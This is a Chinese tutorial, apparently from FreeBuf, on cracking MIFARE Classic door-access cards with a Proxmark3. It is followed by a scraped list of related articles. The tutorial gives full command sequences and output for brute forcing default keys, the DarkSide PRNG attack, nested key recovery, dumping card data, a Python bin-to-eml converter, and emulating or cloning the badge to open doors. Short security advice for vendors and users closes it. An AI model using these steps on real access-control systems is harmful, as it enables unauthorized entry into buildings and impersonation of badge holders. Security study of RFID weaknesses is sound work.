RFID Hacking④:使用ProxMark3 破解门禁
文中提及的部分技术可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!
0×00 前言
国际黑客大会Defcon传统之一:开锁!因为黑客认为锁也是一种安全挑战。我们在黑客题材电影、电视剧中也常常看到:男主女主利用高超的黑客技能侵入目标公司的网络,甚至利用社会工程学突破门禁防护潜入对方办公地点进行物理攻击,如入无人之境。(神盾局、黑客军团、Who am i 貌似都有类似情节)
北上广不相信眼泪 16集
在这一背景下,我们不经思考:门禁系统作为企业物理第一道屏障,这些硬件基础设施安全是否一直都被忽视?
0×01 准备工作
Linux、Windows环境搭建可参考:RFID Hacking②:PM3入门指南 一文。
1.1 进入PM3工作终端
./proxmark3 /dev/ttyACM0
1.2 测试天线
proxmark3> hw tune # LF antenna: 29.98 V @ 125.00 kHz
# LF antenna: 30.39 V @ 134.00 kHz
# LF optimal: 36.30 V @ 129.03 kHz
# HF antenna: 27.90 V @ 13.56 MHz
proxmark3>
1.3 设备固件
proxmark3> hw ver
#db# Prox/RFID mark3 RFID instrument
#db# bootrom: /-suspect 2015-04-02 15:12:04
#db# os: /-suspect 2015-04-02 15:12:11
#db# HF FPGA image built on 2015/03/09 at 08:41:42
0×02 爆破&枚举秘钥
2.1 读取卡片
proxmark3> hf 14a reader
ATQA : 04 00
UID : 2c f0 55 0b
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443a-4 card found, RATS not supported
2.2 执行NESTED攻击,枚举&爆破key:
proxmark3> hf mf chk *1 ? t
No key specified,try default keys
chk default key[0] ffffffffffff
chk default key[1] 000000000000
chk default key[2] a0a1a2a3a4a5
chk default key[3] b0b1b2b3b4b5
chk default key[4] aabbccddeeff
chk default key[5] 4d3a99c351dd
chk default key[6] 1a982c7e459a
chk default key[7] d3f7d3f7d3f7
chk default key[8] 714c5c886e97
chk default key[9] 587ee5f9350f
chk default key[10] a0478cc39091
chk default key[11] 533cb6c723f6
chk default key[12] 8fd0a4f256e9
--SectorsCnt:0 block no:0x03 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:A key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:0 block no:0x03 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:1 block no:0x07 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:2 block no:0x0b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:3 block no:0x0f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:4 block no:0x13 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:5 block no:0x17 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:6 block no:0x1b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:7 block no:0x1f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:8 block no:0x23 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:9 block no:0x27 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:10 block no:0x2b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:11 block no:0x2f key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:12 block no:0x33 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:13 block no:0x37 key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:14 block no:0x3b key type:B key count:13
Found valid key:[ffffffffffff]
--SectorsCnt:15 block no:0x3f key type:B key count:13
Found valid key:[ffffffffffff]
proxmark3>
成功获得卡片key。
2.3 利用PRNG漏洞,执行mifare “DarkSide”攻击
proxmark3> hf mf mifare
-------------------------------------------------------------------------
Executing command. Expected execution time: 25sec on average :-) Press the key on the proxmark3 device to abort both proxmark3 and client.
------------------------------------------------------------------------- uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(090a070d060b0501) nr(00000000) |diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000000| 9 | c |0,0,0,0,0,0,0,0|
| 20 |00000020| a | f |0,0,0,0,0,0,0,0|
| 40 |00000040| 7 | 2 |0,0,0,0,0,0,0,0|
| 60 |00000060| d | 8 |0,0,0,0,0,0,0,0|
| 80 |00000080| 6 | 3 |0,0,0,0,0,0,0,0|
| a0 |000000a0| b | e |0,0,0,0,0,0,0,0|
| c0 |000000c0| 5 | 0 |0,0,0,0,0,0,0,0|
| e0 |000000e0| 1 | 4 |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce... uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d0407030d070c04) nr(00000001) |diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000001| d | 8 |0,0,0,0,0,0,0,0|
| 20 |00000021| 4 | 1 |0,0,0,0,0,0,0,0|
| 40 |00000041| 7 | 2 |0,0,0,0,0,0,0,0|
| 60 |00000061| 3 | 6 |0,0,0,0,0,0,0,0|
| 80 |00000081| d | 8 |0,0,0,0,0,0,0,0|
| a0 |000000a1| 7 | 2 |0,0,0,0,0,0,0,0|
| c0 |000000c1| c | 9 |0,0,0,0,0,0,0,0|
| e0 |000000e1| 4 | 1 |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
key_count:0
Key not found (lfsr_common_prefix list is null). Nt=218e1cd8
Failing is expected to happen in 25% of all cases. Trying again with a different reader nonce... uid(2cf0550b) nt(218e1cd8) par(0000000000000000) ks(0d040e0e0c010e00) nr(00000002) |diff|{nr} |ks3|ks3^5|parity |
+----+--------+---+-----+---------------+
| 00 |00000002| d | 8 |0,0,0,0,0,0,0,0|
| 20 |00000022| 4 | 1 |0,0,0,0,0,0,0,0|
| 40 |00000042| e | b |0,0,0,0,0,0,0,0|
| 60 |00000062| e | b |0,0,0,0,0,0,0,0|
| 80 |00000082| c | 9 |0,0,0,0,0,0,0,0|
| a0 |000000a2| 1 | 4 |0,0,0,0,0,0,0,0|
| c0 |000000c2| e | b |0,0,0,0,0,0,0,0|
| e0 |000000e2| 0 | 5 |0,0,0,0,0,0,0,0|
parity is all zero,try special attack!just wait for few more seconds...
p1:0 p2:0 p3:0 key:ffffffffffff
p1:29e5f p2:18a2b p3:1 key:b8b2a3c07af9
p1:2ba97 p2:19a40 p3:2 key:b5ba0002b5ea
p1:2c3fd p2:19fb9 p3:3 key:b4b979ba49de
p1:3de0e p2:24775 p3:4 key:968a7a09c714
p1:3fdf4 p2:25a7a p3:5 key:931b36c268ed
p1:54f81 p2:32426 p3:6 key:6ecaf371a99d
p1:58b75 p2:34777 p3:7 key:6860b744915b
p1:616dd p2:3998a p3:8 key:59747d7fdf41
p1:63400 p2:3ab54 p3:9 key:56476bbef406
p1:64ae0 p2:3b844 p3:a key:53dc6ee57a91
p1:6dc19 p2:40e78 p3:b key:44554ae362a1
p1:708f8 p2:42956 p3:c key:3f83eb143dd6
p1:7abf0 p2:48987 p3:d key:2e2b8565f96b
p1:7b298 p2:48d82 p3:e key:2d70e3e38553
p1:8420b p2:4e219 p3:f key:1e238b63e204
p1:8ce60 p2:53484 p3:10 key:0f4b7cb380a5
key_count:17
------------------------------------------------------------------
Key found:ffffffffffff Found valid key:ffffffffffff
proxmark3>
通过这一方式,同样可以获得卡片的key,不过很多时候还是要靠运气,因为不是所有的卡片都存在这种漏洞。如果不存在PRNG漏洞,我们则需要通过嗅探卡片和读卡器之间通信的数据包解出卡片的Key。
使用PM3进行中间人攻击嗅探通信数据包的方法可参考:RFID Hacking③:使用ProxMark3嗅探银行闪付卡信息,以及RadioWar团队的 利用Proxmark3监听M1卡交互过程,算出某一区的key
0×03 dump卡片数据&数据处理
使用上述方法,我们成功获得卡片key,接下来我们便可以使用key导出卡片中的所有数据(dumpdata)
proxmark3> hf mf nested 1 0 A ffffffffffff d
--block no:00 key type:00 key:ff ff ff ff ff ff etrans:0
Block shift=0
Testing known keys. Sector count=16
nested...
Time in nested: 0.030 (inf sec per key) -----------------------------------------------
Iterations count: 0 |---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| ffffffffffff | 1 | ffffffffffff | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| ffffffffffff | 1 | ffffffffffff | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to bynary file dumpkeys.bin...
proxmark3>
在这一过程中,在PM3当前工作目录下生成了dumpkey.bin文件:
接下来我们执行hf mf dump便能获得整张卡片的数据:
proxmark3> hf mf dump
|-----------------------------------------|
|------ Reading sector access bits...-----|
|-----------------------------------------|
Command execute timeout
Sending bytes to proxmark failed
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
#db# READ BLOCK FINISHED
|-----------------------------------------|
|----- Dumping all blocks to file... -----|
|-----------------------------------------|
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
#db# READ BLOCK FINISHED
Dumped card data into 'dumpdata.bin'
proxmark3>
此时,卡片数据已经被导出到PM3主目录下的dumpdata.bin这个二进制文件中:
但是PM3并不能识别、使用二进制文件,我们还需要使用脚本将这一个二进制文件转换成eml格式的文本信息:
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml -----Finished
proxmark3>
dumptoemul脚本成功将dumpdata.bin二进制文件转换成以卡片ID值命名的eml格式文件:
我们来对比一下这两个文件:
效果已经很明显了,脚本已经将乱码的二进制文件转换成了txt文本信息。
dumptoemul.lua脚本的功能也可以用Python语言来实现:bin2txet.py
#!/usr/bin/python
from __future__ import with_statement
import sys
import binascii READ_BLOCKSIZE = 16 def main(argv):
argc = len(argv)
if argc < 3:
print 'Usage:', argv[0], 'dumpdata.bin output.txt'
sys.exit(1) with file(argv[1], "rb") as file_inp, file(argv[2], "w") as file_out:
while True:
byte_s = file_inp.read(READ_BLOCKSIZE)
if not byte_s:
break
hex_char_repr = binascii.hexlify(byte_s)
file_out.write(hex_char_repr)
file_out.write("\n") if __name__ == '__main__':
main(sys.argv)
python bin2text.py dumpdata.bin output.txt
mv output.txt 2CF0550B.eml
清除仿真内存的各区块数据:
hf mf eclr
把从卡片中导出的数据加载到PM3设备中:
proxmark3> hf mf eload 2CF0550B
Loaded 64 blocks from file: 2CF0550B.eml
使用PM3模拟门禁卡:
proxmark3> hf mf sim
uid:N/A, numreads:0, flags:0 (0x00)
#db# 4B UID: 2CF0550B
proxmark3>
这时我们可以使用PM3来实现通过门禁。另外一种方式:把从卡片导出的数据从PM3设备内存中克隆到白卡里,使用克隆卡片通过门禁v
proxmark3> hf mf cload e
Cant get block: 1
bingo
0×04 安全建议
目前我国80%的门禁产品均是采用原始IC卡的UID号或ID卡的ID号去做门禁卡,没有去进行加密认证或开发专用的密钥,其安全隐患远比Mifare卡的破解更危险,非法破解的人士只需采用专业的技术手段就可以完成破解过程。
门禁厂商、管理员:做好防护工作加强安全意识,尽量避免使用默认key、安全性低的key;对卡片和门禁读卡器使用身份认证&验证机制,绝对不能直接使用原始IC卡的UID号或ID卡的ID号去做门禁卡!
用户:妥善保管自己的门禁卡,避免信息泄露。
物联网IOT的高速发展,无线通信技术的应用也日趋广泛。本文仅通过门禁系统案例揭露NFC、RFID相关协议&技术存在的一些安全隐患。
我们现实生活中也有真实存在的案例:2010年北京一卡通被爆存在漏洞,可随意修改卡内余额,个人猜测这里很有可能是通过利用mifare卡片的PRNG漏洞来实现的。2014年,国外安全研究员发现台湾铁路、公交系统的悠游卡(EasyCard)同样存在PRNG漏洞,可修改卡片余额,并向悠游卡公司反馈报告了这一漏洞:
0×05 系列文章
RFID Hacking①:突破门禁潜入FreeBuf大本营
RFID Hacking③:使用ProxMark3嗅探银行闪付卡信息
0×06 Refer
Mifare Classic 1k – cracker les clefs et lire le tag avec Proxmark3
offensive-security.com : Cloning RFID Tags with Proxmark 3
DefCon 23 HOW TO TRAIN YOUR RFID HACKING TOOLS
backtrack-linux.org : RFID Cooking with Mifare Classic
BlackHat 2013 USA RFID Hacking Live Free or RFID Hard
原文地址:http://www.freebuf.com/articles/wireless/109151.html
RFID Hacking④:使用ProxMark3 破解门禁的更多相关文章
- RFID Hacking②:PM3入门指南
0×00 前言 Proxmark3是由Jonathan Westhues在做硕士论文中研究Mifare Classic时设计.开发的一款开源硬件,可以用于RFID中嗅探.读取以及克隆等相关操作,如:P ...
- RFID Hacking①:突破门禁潜入FreeBuf大本营
某天,偶然间拿到了FreeBuf Pnig0s同学的工卡信息,终于有机会去做一些羞羞的事情了 引子 以下故事纯属虚构,如有雷同,纯属巧合. 我应聘了一个大型IT公司的"网络攻击研究部经理&q ...
- 利用Teensy进行EM410x卡模拟以及暴力破解EM410X类门禁系统可行性猜想
前些天Open入手了Teensy++2.0模拟EM410X,并且针对EM410X的门禁进行了一次暴力破解测试,以下就是相关代码以及内容. 什么是低频?什么是EM410x? 首先,我不得不再次提一下那些 ...
- 利用Teensy进行em410x卡模拟以及暴力破解em410x类门禁系统
什么是低频?什么是EM410x? 首先,我不得不再次提一下那些工作在125khz频率下的低频卡(如:EM410X之类的),以便大家更好的阅读以下的内容. 什么是低频?以下就是低频的解释: 低频(LF, ...
- 门禁 IC卡 ID 卡 RFID 手环 NFC 银行卡 手机模拟门禁
门禁 IC卡 ID 卡 RFID 手环 NFC 银行卡 手机模拟门禁 原因 最近给公司换了一个门禁. 旧的门禁按键面板已经破了. 不支持我的手环. 按了密码后竟然要按 #. 相关信息 查了资料记录一下 ...
- 手机NFC模拟门禁卡
楼主所在的某电子科技类大学,从宿舍楼到实验楼到图书馆办公楼,全部都有门禁,前两天突然在某安软件市场看到一个可以模拟门禁卡的软件,然而可能是我的手机系统太6了,竟然模拟不了,无奈自己动手,从根本上解决问 ...
- 利用nexus5伪造一张门禁卡
0×00 前言 我租住的杭州一个老小区一年前出现了所谓的“出租房杀人事件”,事件过后民警叔叔们给小区的每个单元都装上了门禁,所有住户都需要在物业处登记,物业的工作人员会让你提供身份证或者公交卡用来注册 ...
- RFID Hacking–资源大合集
原文: http://www.freebuf.com/news/others/605.html http://www.proxmark.org/forum/index.php RFID破解神器官方论坛 ...
- Java 并发专题 : CyclicBarrier 打造一个安全的门禁系统
继续并发专题~ 这次介绍CyclicBarrier:看一眼API的注释: /** * A synchronization aid that allows a set of threads to all ...
随机推荐
- mysql之常用操作
1. 数据库介绍 什么是数据库? 数据库(Database)是按照数据结构来组织.存储和管理数据的仓库,每个数据库都有一个或多个不同的API用于创建,访问,管理,搜索和复制所保存的数据.我们也可以将数 ...
- Android first---放置在外存中的文件读取
照样以登录案例举例: 第一步:界面绘制:跟之前写过的一个案例一样 第二步:逻辑代码 public class MainActivity extends Activity { //定义全局变量 p ...
- Bootstrap_分页
一.带页码的分页导航 <ul class="pagination"> <li><a href="#">«</a> ...
- 【Unity】常用代码
//父子节点相关的: parent 变量表示Transform的父节点 root 表示它的根节点,如果没有父节点,它会返回自己 //根据名字查找子节点 Transform Find(string na ...
- Maven学习(四)-- 生命周期和插件
标签(空格分隔): 学习笔记 Maven生命周期是抽象的,不做任何实际的工作,在Maven的设计中,实际的任务都交由插件来完成. 每个构件步骤都可以绑定一个或者多个插件行为,而且Maven为大多数构建 ...
- c#中对rgb的使用
今天发现c#中没有和vb类似的函数RGB(), 后来发现可以通过Color类来实现 从R,G,B的值可以得到一个Color,如: Color c = Color.FromArgb(255,0,0); ...
- Java 序列化 反序列化 历史版本处理
直接引用 http://www.cnblogs.com/xdp-gacl/p/3777987.html
- 【bzoj2049】洞穴勘测
题意 三种操作: (1)Link (2)Cut (3)询问连通性 分析 分析1:Trick clj的方法... 随机构造的树很容易Trick过掉. 我们考虑直接使用并查集,不使用路径压缩. 再使用换根 ...
- Port Hacking
Port information21 ftp 主要看是否支持匿名,也可以跑弱口令22 ssh23 telnet79 Finger80 web 常见web漏洞以及是否为一些管理后台111 rpcinfo ...
- JS重要知识点
这里列出了一些JS重要知识点(不全面,但自己感觉很重要).彻底理解并掌握这些知识点,对于每个想要深入学习JS的朋友应该都是必须的. 讲解还是以示例代码搭配注释的形式,这里做个小目录: JS代码预解析原 ...